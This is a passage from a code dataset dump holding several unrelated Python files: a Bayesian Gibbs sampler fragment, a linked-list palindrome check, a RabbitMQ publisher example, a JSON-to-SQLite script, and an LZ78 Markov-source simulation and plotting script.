self.Setting['K1_S4'])\n for k1 in range(self.Setting['K1']):\n self.Params['D1_k1'][k1, :, :] = self.Params['D1_k1'][k1, :, :] / np.sum(self.Params['D1_k1'][k1, :, :])\n self.Params['W1_nk1'] = np.random.rand(self.Setting['N_train'], self.Setting['K1'], self.Setting['K1_S1'], self.Setting['K1_S2'])\n self.Params['W1_nk1_Pooling'] = np.sum(np.sum(self.Params['W1_nk1'], axis=3), axis=2)\n\n self.Params['c2_n'] = 1 * np.ones([self.Setting['N_train']])\n self.Params['p2_n'] = 1 / (1 + self.Params['c2_n'])\n\n # 2-th layer\n self.Params['Phi_2'] = 0.2 + 0.8 * np.random.rand(self.Setting['K1'], self.Setting['K2'])\n self.Params['Phi_2'] = self.Params['Phi_2'] / np.sum(self.Params['Phi_2'], axis=0)\n self.Params['Theta_2'] = np.random.rand(self.Setting['N_train'], self.Setting['K2'])\n\n self.Params['c3_n'] = 1 * np.ones([self.Setting['N_train']])\n tmp = -log_max(1 - self.Params['p2_n'])\n self.Params['p3_n'] = (tmp / (tmp + self.Params['c3_n'])) # pj_3 - pj_T+1\n\n # 3-th layer\n self.Params['Phi_3'] = 0.2 + 0.8 * np.random.rand(self.Setting['K2'], self.Setting['K3'])\n self.Params['Phi_3'] = self.Params['Phi_3'] / np.sum(self.Params['Phi_3'], axis=0)\n self.Params['Theta_3'] = np.random.rand(self.Setting['N_train'], self.Setting['K3'])\n\n self.Params['c4_n'] = 1 * np.ones([self.Setting['N_train']])\n tmp = -log_max(1 - self.Params['p3_n'])\n self.Params['p4_n'] = (tmp / (tmp + self.Params['c4_n'])) # pj_3 - pj_T+1\n\n self.Params['Gamma'] = np.ones([self.Setting['K3'], 1]) / self.Setting['K3']\n\n def train(self, iter_all=200):\n\n from scipy.special import gamma\n self.Setting['Burinin'] = 0.75 * iter_all\n self.Setting['Collection'] = iter_all - self.Setting['Burinin']\n\n # Collection\n W_train_1 = np.zeros([self.Setting['N_train'], self.Setting['K1']])\n W_train_2 = np.zeros([self.Setting['N_train'], self.Setting['K2']])\n W_train_3 = np.zeros([self.Setting['N_train'], self.Setting['K3']])\n\n import time\n Iter_time = []\n Iter_lh = []\n\n # ========================== Gibbs ==========================#\n for t in range(iter_all):\n\n start_time = time.time()\n\n # ========================== 1st layer Augmentation ==========================#\n self.Params['D1_k1_Aug'] = np.zeros_like(self.Params['D1_k1']) # Augmentation on D \n self.Params['W1_nk1_Aug'] = np.zeros_like(self.Params['W1_nk1']) # Augmentation on w\n\n\n W1_nk1 = np.array(self.Params['W1_nk1'], dtype='float32', order='C')\n D1_k1 = np.array(self.Params['D1_k1'], dtype='float32', order='C')\n\n W1_nk1_Aug, D1_k1_Aug = self.Conv_Multi_Matrix(self.batch_file_index, self.batch_rows, self.batch_cols, self.batch_value, W1_nk1, D1_k1, self.Setting)\n\n\n self.Params['W1_nk1_Aug'] = np.array(W1_nk1_Aug, dtype='float64') # N*K1*S1*S2\n self.Params['D1_k1_Aug'] = np.array(D1_k1_Aug, dtype='float64') # K1*S3*S4\n self.Params['W1_nk1_Aug_Pooling'] = np.sum(np.sum(self.Params['W1_nk1_Aug'], axis=3), axis=2) # N*K1\n\n # ========================== 2nd layer Augmentation ==========================#\n M1_tmp = np.array(np.transpose(np.round(self.Params['W1_nk1_Aug_Pooling'])), dtype='float64', order='C')\n Theta2_tmp = np.array(np.transpose(self.Params['Theta_2']), dtype='float64', order='C')\n Xt_to_t1_2, WSZS_2 = self.Crt_Multirnd_Matrix(M1_tmp, self.Params['Phi_2'], Theta2_tmp)\n\n # ========================== 3rd layer Augmentation ==========================#\n M2_tmp = np.array(np.round(Xt_to_t1_2), dtype='float64', order='C')\n Theta3_tmp = np.array(np.transpose(self.Params['Theta_3']), dtype='float64', order='C')\n Xt_to_t1_3, WSZS_3 = self.Crt_Multirnd_Matrix(M2_tmp, self.Params['Phi_3'], Theta3_tmp)\n\n # ====================== Parameters Update ======================#\n # Update D,Phi\n for k1 in range(self.Setting['K1']):\n X_k1_34 = self.Params['D1_k1_Aug'][k1, :, :]\n X_k1_34_tmp = np.random.gamma(X_k1_34 + self.SuperParams['eta'])\n D1_k1_s = X_k1_34_tmp / np.sum(X_k1_34_tmp)\n self.Params['D1_k1'][k1, :, :] = D1_k1_s\n\n Phi_2_tmp = np.random.gamma(WSZS_2 + self.SuperParams['eta'])\n self.Params['Phi_2'] = Phi_2_tmp / np.sum(Phi_2_tmp, axis=0)\n\n Phi_3_tmp = np.random.gamma(WSZS_3 + self.SuperParams['eta'])\n self.Params['Phi_3'] = Phi_3_tmp / np.sum(Phi_3_tmp, axis=0)\n\n # Update c_j,p_j\n self.Params['c2_n'] = np.random.gamma(\n self.SuperParams['e0'] + np.sum(np.dot(self.Params['Phi_2'], self.Params['Theta_2'].T), 0))\n self.Params['c2_n'] = self.Params['c2_n'] / (self.SuperParams['f0'] + np.sum(self.Params['W1_nk1_Pooling'], axis=1))\n self.Params['p2_n'] = 1 / (self.Params['c2_n'] + 1)\n\n self.Params['c3_n'] = np.random.gamma(\n self.SuperParams['e0'] + np.sum(np.dot(self.Params['Phi_3'], self.Params['Theta_3'].T), 0))\n self.Params['c3_n'] = self.Params['c3_n'] / (self.SuperParams['f0'] + np.sum(self.Params['Theta_2'], axis=1))\n tmp = -log_max(1 - self.Params['p2_n'])\n self.Params['p3_n'] = tmp / (self.Params['c3_n'] + tmp)\n\n self.Params['c4_n'] = np.random.gamma(self.SuperParams['e0'] + np.sum(self.Params['Gamma']))\n self.Params['c4_n'] = self.Params['c4_n'] / (self.SuperParams['f0'] + np.sum(self.Params['Theta_3'], axis=1))\n tmp = -log_max(1 - self.Params['p3_n'])\n self.Params['p4_n'] = tmp / (self.Params['c4_n'] + tmp)\n\n # Update w_j\n W_k3_sn = np.random.gamma(self.Params['Gamma'] + Xt_to_t1_3) / (\n -log_max(1 - self.Params['p3_n']) + self.Params['c4_n']) # V*N\n self.Params['Theta_3'] = np.transpose(W_k3_sn)\n\n shape2 = np.dot(self.Params['Phi_3'], self.Params['Theta_3'].T)\n W_k2_sn = np.random.gamma(shape2 + Xt_to_t1_2) / (-log_max(1 - self.Params['p2_n']) + self.Params['c3_n']) # V*N\n self.Params['Theta_2'] = np.transpose(W_k2_sn)\n\n shape1 = np.dot(self.Params['Phi_2'], self.Params['Theta_2'].T) # V*N\n W_k1_sn = np.random.gamma(shape1 + self.Params['W1_nk1_Aug_Pooling'].T) / (1 + self.Params['c2_n']) # V*N\n self.Params['W1_nk1_Pooling'] = np.transpose(W_k1_sn)\n\n for k1 in range(self.Setting['K1']):\n self.Params['W1_nk1'][:, k1, 0, :] = (self.Params['W1_nk1_Aug'][:, k1, 0, :] / (\n self.Params['W1_nk1_Aug_Pooling'][:, k1:k1 + 1] + 0.0001)) * self.Params['W1_nk1_Pooling'][:,\n k1:k1 + 1]\n\n if t >= self.Setting['Burinin']:\n W_train_1 = W_train_1 + np.sum(self.Params['W1_nk1'][:, :, 0, :], axis=2)\n W_train_2 = W_train_2 + self.Params['Theta_2']\n W_train_3 = W_train_3 + self.Params['Theta_3']\n\n end_time = time.time()\n\n if t == 0:\n Iter_time.append(end_time - start_time)\n else:\n Iter_time.append(end_time - start_time + Iter_time[-1])\n\n print(\"epoch \" + str(t) + \" takes \" + str(end_time - start_time) + \" seconds\")\n\n\n W_train_1 = W_train_1 / self.Setting['Collection']\n W_train_2 = W_train_2 / self.Setting['Collection']\n W_train_3 = W_train_3 / self.Setting['Collection']\n\n\n","sub_path":"pydpm/model/cpgbn.py","file_name":"cpgbn.py","file_ext":"py","file_size_in_byte":11044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"630836528","text":"'''\nhttps://www.interviewbit.com/problems/palindrome-list/\nPalindrome List\n\nGiven a singly linked list, determine if its a palindrome. Return 1 or 0 denoting if its a palindrome or not, respectively.\n\nNotes:\n\nExpected solution is linear in time and constant in space.\nFor example,\n\nList 1-->2-->1 is a palindrome.\nList 1-->2-->3 is not a palindrome.\n\n'''\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param A : head node of linked list\n # @return an integer\n def lPalin(self, A):\n if not A or not A.next:\n return 1\n size = 0\n c = A\n while c:\n size += 1\n c = c.next\n trav = int(size / 2) - 1\n i = 0\n p = None\n c = A\n n = c.next\n while i < trav:\n c.next = p\n p = c\n c = n\n n = n.next\n i += 1\n left = c\n right = c.next\n if size % 2 == 1:\n right = right.next\n left.next = p\n while left and right:\n if left.val != right.val:\n return 0\n else:\n left = left.next\n right = right.next\n return 1\n\n","sub_path":"palindrome_list.py","file_name":"palindrome_list.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"644448467","text":"#!/usr/bin/env python\n#https://www.rabbitmq.com/tutorials/tutorial-one-python.html\n#sudo pip install pika\n#https://pika.readthedocs.io/en/0.10.0/intro.html\n#http://github.com/rabbitmq/rabbitmq-tutorials/blob/master/python/send.py\n\nimport pika\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost')) #standard port (5672)\nchannel = connection.channel()\nchannel.queue_declare(queue='hello')\n\n# In RabbitMQ a message can never be sent directly to the queue, it always needs to go through an exchange.\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body='Hello World!')\n\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body='this is the 2nd message')\n\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body='11/17/17 - this is the 3rd message')\n\nconnection.close()\n\nprint(\" [x] Message were sent\")\n","sub_path":"rabbitmq/src/main/python/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"498915711","text":"import json\nimport sqlite3\n\n__author__ = 'HaveF'\n\nJSON_FILE = \"etymonline_data.json\"\nDB_FILE = \"etymonline_data.db\"\n\ntraffic = json.load(open(JSON_FILE))\n\nwith sqlite3.connect(DB_FILE) as db:\n c = db.cursor()\n c.execute('''create table etymonline\n (no INT primary key,\n word TEXT,\n\t\t origin TEXT)''')\n query = \"insert into etymonline values (?,?,?)\"\n for idx,item in enumerate(traffic):\n word = item['word'][0]\n origin_list = item['origin']\n origin = u''\n for i in origin_list:\n origin = origin+i\n c.execute(query, [idx, word, origin])\n\n# Theoretically, these are not necessary.\nc.close()\ndb.commit()\ndb.close()\n","sub_path":"json2sqlite_only_etymonline_data.py","file_name":"json2sqlite_only_etymonline_data.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"195203922","text":"\"\"\"Plotting graphs and histogram_chains using data from LZ78 applied to Markov sources\n\nSimulation\n\n $ python main.py \n\n Plots the usual histogram_chains from the set of experiments in .\n\n $ python main.py -s \n\n Runs a simulation after prompting for three coupless (n_word, n_exp)\n and saves it as .\n\n $ python main.py -range \n\n Runs a simulation after prompting for a range of values ns\n and saves it as .\n\n $ python main.py -m --file \n\n Loads the set of experiments and plots the graphs related\n to mean analysis.\n\n $ python main.py -m --save \n\n Runs the analysis and then saves the data - with analysis - into\n the file .\n\n $ python main.py -v (--file | --save )\n\n Works the same as the -m argument previously seen, except that it\n does variance analysis and plots.\n\n $ python main.py -cdf (--file | --save )\n\n Works the same as the -m argument previously seen, except that it\n does cumulative distribution function analysis and plots.\n\n\n\"\"\"\n\nimport numpy as np # learn more: https://python.org/pypi/np\nfrom math import log\nfrom scipy.stats import norm\n\n# from scipy.stats import normaltest\nimport sys\nfrom szpan import var, h_2, entropy\nfrom markov import markov_chain, markov_source2\nfrom neininger import H, sigma2_H3\nfrom lempelziv import compress, compress2\n\nimport matplotlib.pyplot as plt\nfrom math import sqrt\nimport seaborn as sns\n\n# import pandas as pd\nfrom scipy import stats\nfrom eigenvalues import lambda_2, eigenvalue_std\n\nfrom progress.bar import Bar\n\nsns.set(color_codes=True)\nnp.random.seed(sum(map(ord, \"distributions\")))\n\nDEBUG = True\n\n# Failed attempt at speeding the simulation of words\n# def fast_word_generator(M, f, n, N):\n# \"Outputs N words of size n from M\"\n# probas = np.random.rand(N, n)\n# m00 = M[0, 0]\n# m10 = M[1, 0]\n# d = {0: m00, 1: m10}\n# words = [[f[int(probas[i, 0] > m00)]] for i in range(N)]\n\n# for j in range(1, n):\n# for i in range(N):\n# w = words[i][-1]\n# words[i].append(f[(w + int(probas[i, j] > d[w])) % 2])\n\n# input(\"Generated words\")\n# return words\n\n\ndef simulation(\n random_markov=True, filesave=\"experiment_data.npy\", length_values=None, n_exp=None\n):\n \"\"\"Generates words from a Markov source.\n \"\"\"\n\n # Taking care of the different interactive modes\n if length_values is None:\n i = 1000\n length_values = [10 * i, 50 * i, 100 * i]\n\n style_mode = False\n\n fast_mode = input(\n \"Do you want fast mode activated? Y/n/s (default = true, s = style_mode) \"\n )\n\n if fast_mode == \"n\":\n fast_mode = False\n\n elif fast_mode == \"s\":\n style_mode = True\n length_values = [500, 1000, 2000]\n n_exp = 100\n\n else:\n fast_mode = True\n print(\"\\nChoose words lengths:\\n\")\n length_values = [int(input(str(i) + \": \")) for i in range(3)]\n n_exp = int(input(\"Number of experiments\"))\n\n else:\n if n_exp is None:\n n_exp = int(input(\"Specifiy number of experiments\"))\n\n fast_mode = True\n style_mode = False\n\n # In case the Markov chain isn't randomized, this is the chain we'll use\n if not random_markov:\n p_a = 0.9\n M = np.matrix([[p_a, 1 - p_a], [1 - p_a, p_a]])\n h = -p_a * log(p_a, 2) - (1 - p_a) * log(1 - p_a, 2)\n f = [0, 1]\n\n else:\n N = 2\n M = markov_chain(N)\n h = entropy(M)\n f = [0, 1]\n print(\"Random markov has values\", M)\n\n # Some output for slow mode\n # if not fast_mode:\n # print(\"\\nUsing a random Markov chain of size \" + str(N))\n # input(M)\n # print(\"\\nIts state function f is:\")\n # input(f)\n # print(\"\\nIts entropy is:\")\n # input(h)\n # print(\"\\nIts h2 is:\")\n # input(h_2(M))\n # print(\"\\nh2-h^2 is:\")\n # input(h_2(M) - h ** 2)\n\n # Initializing the dictionaries used to store the experiments\n # Many keys are being used, such as \"h\" for entropy, \"M\" for\n # the chain, \"n_exp\", \"n_word\", etc.\n # The experiments are stored in this format in npy files.\n exps = [dict() for _ in range(len(length_values))]\n\n for i, n in enumerate(length_values):\n exp = exps[i]\n\n exp[\"h\"] = h\n exp[\"M\"] = M\n\n if not (fast_mode or style_mode):\n try:\n n = int(input(\"\\nChoose size of words to test (default %d) \" % n))\n except:\n n = n\n\n try:\n n_exp = int(\n input(\"\\nHow many experiments do I run? (default %d) \" % 200)\n )\n except:\n n_exp = 200\n\n print(\"\\nNow simulating words of size %d, doing %d experiments \" % (n, n_exp))\n exp[\"n_exp\"] = n_exp\n exp[\"n_word\"] = n\n\n # Runs LZ78 over n_exp samples of words of length n from\n # the Markov chain M\n # word_gen = word_generator(M, f, n)\n # l =[word_gen() for _ in range(n_exp)]\n # l = fast_word_generator(M,f,n,n_exp)\n # c = [compress2(w) for w in l]\n # m = [len(x) for x in c]\n bar = Bar(\"Processing\", max=n_exp)\n m = []\n for _ in range(n_exp):\n m.append(compress2(markov_source2(M, n)))\n bar.next()\n\n exp[\"data\"] = m\n\n exps[0][\"ns\"] = length_values\n print(\"\\nNow savings experiments to \" + filesave)\n np.save(filesave, exps)\n\n return exps, fast_mode\n\n\ndef data_analysis(\n exps=None,\n random_markov=True,\n datafile=None,\n filesave=\"experiment_data.npy\",\n length_values=None,\n n_exp=None,\n fast_mode=False,\n):\n\n # If no experiments were given as argument, start simulation.\n if exps is None:\n if datafile is None:\n if n_exp is None:\n n_exp = 500\n exps, fast_mode = simulation(\n random_markov=random_markov,\n filesave=filesave,\n length_values=length_values,\n n_exp=n_exp,\n )\n\n else:\n fast_mode = False\n exps = np.load(datafile)\n\n for exp in exps:\n n = exp[\"n_word\"]\n n_exp = exp[\"n_exp\"]\n h = exp[\"h\"]\n M = exp[\"M\"]\n\n print(\n \"\\n ===== This experiment has %d samples of words of size %d\" % (n_exp, n)\n )\n print(\"Using chain {}\".format(M))\n\n # Theoretical mean\n mean = h * n / log(n)\n # mean2 = H(M) * n / log(n, 2)\n # H(M) # à enlever\n\n # if not fast_mode:\n # input(\"\\nTheoretical mean is {}\".format(mean))\n exp[\"mean\"] = mean\n\n # Theoretical variances\n std_nein = sqrt(sigma2_H3(M) * n) / log(n, 2)\n # std_szpan = sqrt ( -(h_2(M) - (h**2)) * h**3 * n )\n # print(\"M is\", M)\n print(\"\\nNumber of experiments: \", n)\n # print(\"\\nValue for variance var(M)\", var(M, n))\n print(\"\\nValue of log(m): \", log(mean))\n # std_szpan = sqrt(abs(var(M, n)))\n std_szpan = eigenvalue_std(M, n) # computed with lambda\n std_eig = eigenvalue_std(M, n)\n exp[\"std_nein\"] = std_nein\n exp[\"std_szpan\"] = std_szpan\n\n print(\"\\nComputed std_szpan and std_nein: ({}, {})\".format(std_szpan, std_nein))\n\n # Normalized values from Nein and Szpan papers\n d_nein = [(m_n - mean) / std_nein for m_n in exp[\"data\"]]\n d_szpan = [(m_n - mean) / std_szpan for m_n in exp[\"data\"]]\n d_eig = [(m_n - mean) / std_eig for m_n in exp[\"data\"]]\n exp[\"d_nein\"] = d_nein\n exp[\"d_szpan\"] = d_szpan\n exp[\"d_eig\"] = d_eig\n\n # Empirical variance and mean\n # Samples corresponding to normal distribution p\n\n print(\"Showing the data\")\n\n mu, std = norm.fit(exp[\"data\"])\n exp[\"mu\"] = mu\n exp[\"std\"] = std\n\n if not fast_mode:\n print(\"\\nFitting mean and std are (mu=%f) and (sigma==%f)\" % (mu, std))\n\n # Empirical variance, theoretical mean\n # also theoretical mean and theoretical variance\n mi = min(exp[\"data\"])\n ma = max(exp[\"data\"])\n xmins = [(mi - me) / v for me in [mu, mean] for v in [std, std_nein, std_szpan]]\n xmaxs = [(ma - me) / v for me in [mu, mean] for v in [std, std_nein, std_szpan]]\n\n # 0 = mu (empirical mean) and std (empirical standard deviation)\n # 1 = mu and std_nein\n # 2 = mu and std_szpan\n # 3 = mean and std\n # 4 = mean and std_nein\n # 5 = mean and std_szpan\n for i in range(len(xmins)):\n xmin, xmax = xmins[i], xmaxs[i]\n x = np.linspace(xmin, xmax)\n p = stats.norm(0, 1).pdf(x)\n exp[\"x\" + str(i)] = x\n exp[\"p\" + str(i)] = p\n\n if datafile is not None:\n print(\"\\nNow savings data analysis to \" + datafile)\n np.save(datafile, exps)\n\n return exps\n\n\ndef data_loading(filesave=None, datafile=None):\n \"\"\"Loads experiments by either simulating them or loading them from memory.\n Analyses experiments that previously weren't\n \"\"\"\n\n if datafile is None:\n\n print(\"\\nChoose ns interval range(a, b, s)\")\n\n a = int(input(\"a = \"))\n b = int(input(\"b = \"))\n s = int(input(\"s = \"))\n ns = list(range(a, b, s))\n n_exp = int(input(\"\\nHow many experiments ? \"))\n\n exps = data_analysis(filesave=filesave, length_values=ns, n_exp=n_exp)\n\n else:\n\n print(\"Loading file \", datafile)\n\n exps = np.load(datafile)\n\n print(\"Analysing the experiments\")\n\n fast_mode = (\n False\n if input(\"Do you want to see the values? y/N (defaut is false) \").lower() == \"y\"\n else True\n )\n\n exps = data_analysis(exps=exps, datafile=datafile, fast_mode=fast_mode)\n\n try:\n ns = exps[0][\"ns\"]\n except:\n print(\"ns wasn't defined in exps, attempting to define it automatically\") # maybe something else\n ns = [exp['n_word'] for exp in exps]\n exps[0][\"ns\"] = ns\n\n if datafile:\n np.save(datafile, exps)\n\n return exps, ns\n\n\ndef analysing_theoretical_std(filesave=None, datafile=None, save=None, save_name=None):\n \"\"\"Computes graphs of theoretical standard deviation versus empirical ones.\n \"\"\"\n exps, ns = data_loading(filesave=filesave, datafile=datafile)\n n_exp = exps[0][\"n_exp\"]\n\n # N = 3\n stds = [exp[\"std\"] for exp in exps]\n # variances = [exp['std'] ** 2 for exp in exps]\n neins = [exp[\"std_nein\"] for exp in exps]\n szpans = [exp[\"std_szpan\"] for exp in exps]\n diff1 = [stds[i] - neins[i] for i in range(len(stds))]\n diff2 = [stds[i] - szpans[i] for i in range(len(stds))]\n \n al = 40 / (1000 * (sqrt(5) -1))\n be = 40 * (1 - (1 / (sqrt(5)-1) ))\n\n sqrt1 = [-(al * sqrt(n) + be) for n in ns]\n\n # fsts = [diff[40] - log(ns[40], 2) ** (0.5 + i*0.1 + 0.3) for i in range(N)]\n try:\n fst = diff1[10] - log(ns[10], 2)\n except:\n fst = diff1[0] - log(ns[0], 2)\n # logs = [[log(n, 2) ** (0.5 + i*0.1 + 0.3) + fsts[i] for n in ns] for i in range(N)]\n logs = [log(n, 2) + fst for n in ns]\n\n figs, axs = plt.subplots(1, 2, tight_layout=True)\n \n axs[0].plot(ns, stds, label=r\"$\\sigma$\")\n axs[0].plot(ns, neins, label=r\"$\\sigma_{Neininger}$\")\n axs[0].plot(ns, szpans, label=r\"$\\sigma_{Szpankowski}$\")\n\n axs[0].set_title(\n r\"Empirical standard deviation ($\\sigma$)\"\n + r\" and theoretical ones ($\\sigma_{Neininger}$, $\\sigma_{S}$), $n_{exp}$ = \"\n + str(n_exp)\n )\n\n axs[1].plot(ns, diff1, label=r\"$\\Delta \\sigma = \\sigma - \\sigma_{Neininger}$\")\n axs[1].plot(ns, diff2, label=r\"$\\Delta \\sigma = \\sigma - \\sigma_{Szpan}$\")\n\n # for i in range(N):\n # e = 0.5 + i*0.1 + 0.3\n # axs[1].plot(ns, logs[i], label=r'${(\\log_2(n))}^{%1.2f}-%1.2f$' % (e, -fsts[i]))\n\n # axs[1].plot(ns, sqrt1, label=r\"${-(\\alpha\\sqrt{n}+\\beta)}$\")\n axs[1].set_title(\n \"Difference between standard deviations, $n_{exp}$ = \" + str(n_exp)\n )\n\n import importlib\n\n for ax in axs:\n ax.set_xlabel(\"Word length n\")\n ax.legend()\n sns.reset_defaults()\n ax.plot(ns, np.zeros(len(ns)), 'b+', ms=10)\n importlib.reload(sns)\n ax.ticklabel_format(style='sci', axis='x', scilimits=(0,0))\n\n if save:\n print(\"Saving figure as \" + save_name)\n plt.savefig(save_name, dpi=\"figure\")\n\n\ndef analysing_theoretical_mean(filesave=None, datafile=None, save=None, save_name=None):\n r\"\"\"Computes graphs of theoretical means versus empirical ones.\n The goal is to identify a \\log n tendency\"\"\"\n exps, ns = data_loading(filesave=filesave, datafile=datafile)\n n_exp = exps[0][\"n_exp\"]\n\n mus = [exp[\"mu\"] for exp in exps]\n means = [exp[\"mean\"] for exp in exps]\n diff = [mus[i] - means[i] for i in range(len(mus))]\n # inv_diff = [1/d for d in diff]\n n_log2 = [n / log(n, 2) ** 2 for n in ns]\n n_log = [n / log(n, 2) for n in ns]\n # n_log32 = [n / log(n, 2)**(1.34) for n in ns]\n # logs = [log(n,2) for n in ns]\n div = [mus[i] / means[i] for i in range(len(mus))]\n # inv = [1/n for n in ns]\n # inv_logs = [1/x for x in logs]\n es = [0.01 * i for i in range(2, 8)]\n different_logs = [[n / log(n, 2) ** (1.30 + e) for n in ns] for e in es]\n # asympt = [diff[i] * sqrt(ns[i]) / log(ns[i], 2) for i in range(len(ns))]\n\n figs, axs = plt.subplots(1, 3, tight_layout=True)\n\n axs[0].plot(ns, mus, color=\"orange\", label=r\"$\\mu$\")\n axs[0].plot(\n ns,\n means,\n color=\"green\",\n label=r\"$E_{\\text{th}} = \\frac{nh}{\\log_2(n)}$\",\n linestyle=\"-\",\n )\n axs[0].set_title(r\"Empirical ($\\mu$) and theoretical mean ($E_{\\text{th}}$) plots\")\n\n axs[1].plot(ns, n_log2, color=\"green\", label=r\"$\\frac{n}{\\log_2^2 n}$\")\n\n # for (i,e) in enumerate(es):\n # axs[1].plot(ns, different_logs[i], label=r'$\\frac{n}{(\\log_2(n))^{' + str(1.30+e) + '}}$')\n\n axs[1].plot(ns, diff, color=\"black\", label=r\"$\\Delta E$\", linestyle=\"-\")\n\n axs[1].plot(ns, n_log, color=\"red\", label=r\"$\\frac{n}{\\log_2 n}$\")\n axs[1].set_title(r\"Difference $\\Delta E = \\mu-E_{th}$, and approximations\")\n\n # axs[2].plot(ns, div, color='blue', label=\"$(\\Delta E)^{-1}$\", linestyle=\"-\")\n # axs[2].plot(ns, logs, color=\"green\", label=\"$\\log_2 n$\")\n # axs[2].plot(ns, inv_logs, color=\"red\", label=r'$\\frac{1}{\\log_2 n}$')\n # axs[2].set_title(\"Division $\\mu/mean$\")\n\n axs[2].plot(\n ns,\n div,\n color=\"blue\",\n label=r\"$\\frac{\\sqrt{n}(\\mu-E_{th})}{\\log_2 n}$\",\n linestyle=\"-\",\n )\n axs[2].set_title(r\"Verifying $\\frac{\\sqrt{n}(\\mu-E_{th})}{\\log_2 n} = o(1)$\")\n\n # axs[2].plot(ns, inv_diff, color='blue', label=\"$(\\Delta E)^{-1}\", linestyle=\"-\")\n # axs[2].set_title(\"Inverse of $\\Delta E$ with logarithmic n\")\n # axs[2].set_xscale('log')\n\n axs[0].set_ylabel(\n \"Different computations for number of phrases expectancy $E(M_n)$\"\n )\n for ax in axs:\n ax.set_xlabel(\"Word length n\")\n ax.legend()\n\n if save:\n print(\"Saving figure as \" + save_name)\n plt.savefig(save_name, dpi=\"figure\")\n\n\ndef cdf(data):\n \"\"\"Outputs the cumulative distribution of a set of data\"\"\"\n\n ntotal = len(data)\n cdfs = []\n\n for x in sorted(data):\n cdfs.append(len([d for d in data if d <= x]) / ntotal)\n\n return cdfs\n\n\ndef cdf2(xs, data):\n\n ntotal = len(data)\n cdfs = []\n\n for x in xs:\n c = len([d for d in data if d <= x])\n cdfs.append(c / ntotal)\n\n return cdfs\n\n\ndef print_cdf(exp, ax, mean, std):\n \"\"\"Prints the cdf associated to the experiments exps on the axes axs\"\"\"\n\n mu = exp[mean]\n std = exp[std]\n\n mi = min(exp[\"data\"])\n ma = max(exp[\"data\"])\n\n xs = np.linspace((mi - mu) / std, (ma - mu) / std, 500)\n norm_cdf = [norm.cdf(x) for x in xs]\n\n norm_data = (exp[\"data\"] - mu) / std\n data_cdf = cdf2(xs, norm_data)\n\n ax.plot(xs, data_cdf, color=\"green\", label=\"Data CDF\")\n ax.plot(xs, norm_cdf, color=\"red\", label=\"Normal CDF\")\n\n ax.legend()\n\n ax.set_title(\n r\"$n_{word} =\"\n + latex_float(exp[\"n_word\"])\n + r\"\\quad n_{exp} = \"\n + latex_float(exp[\"n_exp\"])\n + \"$\"\n )\n ax.set_xlabel(\n r\"$\\frac{(M_n-\" + (r\"\\mu\" if mean == \"mu\" else r\"E_{theor}\") + r\")}{\\sigma}$\"\n )\n\n\ndef latex_float(f):\n float_str = \"{0:.2g}\".format(f)\n if \"e\" in float_str:\n base, exponent = float_str.split(\"e\")\n return r\"{0} \\cdot 10^{{{1}}}\".format(base, int(exponent))\n else:\n return float_str\n\n\ndef print_histogram_chains(random_markov=True, datafile=None, fast_mode=True):\n \"\"\"Prints the histogram_chains corresponding to datasets of words generated by a\n Markov source.\"\"\"\n # Plotting raw M_n values\n exps = data_analysis(\n random_markov=random_markov, datafile=datafile, fast_mode=fast_mode\n )[-5:]\n\n # Raw histograms; not useful anymore\n # figs_raw, axs = plt.subplots(1, len(exps))\n # axs[0].set_ylabel(\"Counts\")\n #\n # for (i, exp) in enumerate(exps):\n # sns.distplot(exp[\"data\"], ax=axs[i], rug=True, kde=False, bins=\"auto\")\n # axs[i].set_title(\n # r\"$n_{word} =\"\n # + latex_float(exp[\"n_word\"])\n # + r\"\\quad n_{exp} = \"\n # + latex_float(exp[\"n_exp\"])\n # + \"$\"\n # )\n # axs[i].set_xlabel(\"$M_n$\")\n\n # Normalized distirbutions plots, using mu, mean and empirical std\n # k = 0 is empirical mean and variance\n # k = 1 is theoretical mean and empirical variance\n empirical_std = False\n\n if empirical_std:\n figs_mean_std, axs_mean_std = plt.subplots(1, len(exps))\n figs_normalized, axs_normalized = plt.subplots(1, len(exps))\n\n axs = [axs_normalized, axs_mean_std]\n means = [\"mu\", \"mean\"]\n\n for k in [0, 1]:\n ax = axs[k]\n mean = means[k]\n ax[0].set_ylabel(\"Frequency\")\n\n for (i, exp) in enumerate(exps):\n norm_distrib = (exp[\"data\"] - exp[mean]) / exp[\"std\"]\n # statistic, pvalue = normaltest(norm_distrib)\n sns.distplot(\n norm_distrib,\n ax=ax[i],\n rug=True,\n label=r\"Simulation $\\frac{M_n -\"\n + (r\"\\mu\" if mean == \"mu\" else r\"E_{theor}\")\n + r\"}{\\sigma}$\",\n )\n # ax[i].text(-4, 0.3, r'$test=%1.3f$' % statistic)\n # ax[i].text(-4, 0.28, r'$pvalue=%1.3f$' % pvalue)\n ax[i].set_title(\n r\"$n_{word} =\"\n + latex_float(exp[\"n_word\"])\n + \"\\quad n_{exp} = \"\n + latex_float(exp[\"n_exp\"])\n + \"$\"\n )\n ax[i].set_xlabel(\n r\"$\\frac{(M_n-\"\n + (\"\\mu\" if mean == \"mu\" else \"E_{theor}\")\n + \")}{\\sigma}$\"\n )\n\n # Print awaited normal distribution\n ax[i].plot(\n exp[\"x\" + str(k * 3)],\n exp[\"p\" + str(k * 3)],\n color=\"red\",\n label=\"$\\mathcal{N}(0,1)$\",\n )\n\n # k=0 is plotting distributions centered with empirical mean (mu and nein/szpan)\n # k=1 is plotting distributions norm with theoretical mean and variances (mu and nein/szpan)\n figs1, axs1 = plt.subplots(1, len(exps))\n figs2, axs2 = plt.subplots(1, len(exps))\n figs4, axs4 = plt.subplots(1, len(exps))\n figs5, axs5 = plt.subplots(1, len(exps))\n\n figs = [figs1, figs2, figs4, figs5]\n axes = [axs1, axs2, axs4, 